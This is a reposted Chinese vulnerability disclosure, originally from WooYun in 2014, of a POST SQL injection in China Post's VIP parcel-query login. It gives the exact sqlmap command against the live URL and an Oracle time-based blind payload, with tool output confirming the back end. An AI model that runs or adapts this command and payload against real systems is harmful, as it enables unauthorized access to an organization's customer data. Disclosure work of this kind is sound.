记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国邮政存在一处POST注射漏洞(疑似包裹跟踪数据)

2014-05-27 00:05

http://chinapost.com.cn/

主页有处邮政包裹查询,点击跳转到

http://yjcx.chinapost.com.cn/

q1.jpg



选择大客户查询,跳转到http://yjcx.chinapost.com.cn/vipcustom.do?action=vipLogin

该url存在post注入

随便输一下账户密码,抓一下包

q2.jpg



sqlmap.py -u "http://yjcx.chinapost.com.cn/vipcustom.do?action=vipLoginVal" --data "vipCode=123456&password=123456&code=8116"



vipCode参数存在注入

---

Place: POST

Parameter: vipCode

Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: vipCode=123456' AND 9654=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(111

)||CHR(107)||CHR(80),5) AND 'JdvD'='JdvD&password=123456&code=8116

---

[12:58:51] [INFO] the back-end DBMS is Oracle

web application technology: Servlet 2.4, JSP, JSP 2.0

back-end DBMS: Oracle

[12:58:51] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 1 times

[12:58:51] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou

tput\yjcx.chinapost.com.cn'

数据库:

q3.jpg



由于表太多,且我速度又慢,就不继续跑下去了





漏洞证明:

见详细说明

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-055916

阅读:79896 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国邮政存在一处POST注射漏洞(疑似包裹跟踪数据)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云